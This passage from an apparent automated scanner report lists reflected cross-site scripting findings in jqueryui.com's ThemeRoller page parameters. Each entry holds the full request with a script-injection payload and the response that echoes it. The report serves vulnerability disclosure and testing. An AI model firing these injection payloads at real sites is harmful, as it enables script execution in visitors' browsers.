   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccca89eb"><script>alert(1)</script>243270c1e17&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

4.588. http://jqueryui.com/themeroller/ [bgColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 647b8"><script>alert(1)</script>eb0371bb5c was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee647b8"><script>alert(1)</script>eb0371bb5c&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
9999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee647b8"><script>alert(1)</script>eb0371bb5c&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&b
...[SNIP]...

4.589. http://jqueryui.com/themeroller/ [bgColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66799"><script>alert(1)</script>b366a3b969c was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada66799"><script>alert(1)</script>b366a3b969c&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:03:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada66799"><script>alert(1)</script>b366a3b969c&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=
...[SNIP]...

4.590. http://jqueryui.com/themeroller/ [bgColorOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca091"><script>alert(1)</script>3b444860e28 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaaca091"><script>alert(1)</script>3b444860e28&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:06:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
efa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaaca091"><script>alert(1)</script>3b444860e28&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

4.591. http://jqueryui.com/themeroller/ [bgColorShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 146db"><script>alert(1)</script>2fe2f03b949 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa146db"><script>alert(1)</script>2fe2f03b949&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:06:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa146db"><script>alert(1)</script>2fe2f03b949&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.592. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b6fb"><script>alert(1)</script>9fead6d3d2a was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=654b6fb"><script>alert(1)</script>9fead6d3d2a&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:04:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=654b6fb"><script>alert(1)</script>9fead6d3d2a&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColo
...[SNIP]...

4.593. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a49f"><script>alert(1)</script>e2dd7647322 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=758a49f"><script>alert(1)</script>e2dd7647322&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:01:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=758a49f"><script>alert(1)</script>e2dd7647322&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefaul
...[SNIP]...

4.594. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d65"><script>alert(1)</script>b2f2024e930 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=7564d65"><script>alert(1)</script>b2f2024e930&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:02:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=7564d65"><script>alert(1)</script>b2f2024e930&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgC
...[SNIP]...

4.595. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ea1d"><script>alert(1)</script>17d3870f713 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=955ea1d"><script>alert(1)</script>17d3870f713&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=955ea1d"><script>alert(1)</script>17d3870f713&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

4.596. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1374"><script>alert(1)</script>39f6c08697f was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75a1374"><script>alert(1)</script>39f6c08697f&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75a1374"><script>alert(1)</script>39f6c08697f&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22
...[SNIP]...

4.597. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0b60"><script>alert(1)</script>13f84838c4b was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

